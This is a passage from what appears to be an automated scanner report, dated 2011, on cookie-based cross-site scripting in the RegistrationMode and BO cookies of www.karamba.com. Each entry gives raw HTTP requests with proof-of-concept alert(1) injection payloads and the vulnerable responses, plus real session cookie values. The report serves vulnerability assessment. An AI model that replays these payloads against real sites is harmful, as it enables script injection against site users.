            strRegistra
...[SNIP]...

3.276. http://www.karamba.com/Privacy.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Privacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df76"-alert(1)-"ee1448662fa was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Privacy.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM2df76"-alert(1)-"ee1448662fa; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2df76"-alert(1)-"ee1448662fa; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2df76"-alert(1)-"ee1448662fa";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.277. http://www.karamba.com/Promotions.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f5d3"-alert(1)-"9da94da91d8 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM8f5d3"-alert(1)-"9da94da91d8; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: BO=FM8f5d3"-alert(1)-"9da94da91d8; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:58 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM8f5d3"-alert(1)-"9da94da91d8";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.278. http://www.karamba.com/Promotions.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e15"-alert(1)-"36510cce250 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMc1e15"-alert(1)-"36510cce250; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc1e15"-alert(1)-"36510cce250; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:45 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc1e15"-alert(1)-"36510cce250";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.279. http://www.karamba.com/Responsible.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19edf"-alert(1)-"0bece34424 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM19edf"-alert(1)-"0bece34424; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: BO=FM19edf"-alert(1)-"0bece34424; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM19edf"-alert(1)-"0bece34424";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.280. http://www.karamba.com/Responsible.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd25a"-alert(1)-"3f178a0f857 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMdd25a"-alert(1)-"3f178a0f857; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMdd25a"-alert(1)-"3f178a0f857; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:04 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMdd25a"-alert(1)-"3f178a0f857";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.281. http://www.karamba.com/Sitemap.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Sitemap.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 197d8"-alert(1)-"9d1dc96b4ef was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM197d8"-alert(1)-"9d1dc96b4ef; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: BO=FM197d8"-alert(1)-"9d1dc96b4ef; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:37 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM197d8"-alert(1)-"9d1dc96b4ef";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.282. http://www.karamba.com/Sitemap.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Sitemap.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 866e2"-alert(1)-"16942f1d99f was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Sitemap.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM866e2"-alert(1)-"16942f1d99f; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM866e2"-alert(1)-"16942f1d99f; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:23 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM866e2"-alert(1)-"16942f1d99f";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.283. http://www.karamba.com/Terms.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bbb0"-alert(1)-"e923809c13 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM2bbb0"-alert(1)-"e923809c13; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: BO=FM2bbb0"-alert(1)-"e923809c13; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:13 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 108568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2bbb0"-alert(1)-"e923809c13";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.284. http://www.karamba.com/Terms.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e47a2"-alert(1)-"84fe6f787fb was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PMe47a2"-alert(1)-"84fe6f787fb; BO=FM; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMe47a2"-alert(1)-"84fe6f787fb; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:38:59 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 108569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMe47a2"-alert(1)-"84fe6f787fb";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.285. http://www.karamba.com/UnderAge.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c835b"-alert(1)-"2aef8b92336 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; LanguageCode=ENG; CSI_27=EncryptedUniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FMc835b"-alert(1)-"2aef8b92336; CountryCode=US; CSITemp=27; ASP.NET_SessionId=ahgl2vrvqe4n2rrlqp2bxl55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:39:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: BO=FMc835b"-alert(1)-"2aef8b92336; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: UniqueVisitorID=901E87C19EF9234224C5AA19B5665AD5; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:39:31 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMc835b"-alert(1)-"2aef8b92336";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.286. http://www.karamba.com/UnderAge.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.karamba.com
Path:	/UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b27e8"-alert(1)-"4b3e1647c57 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

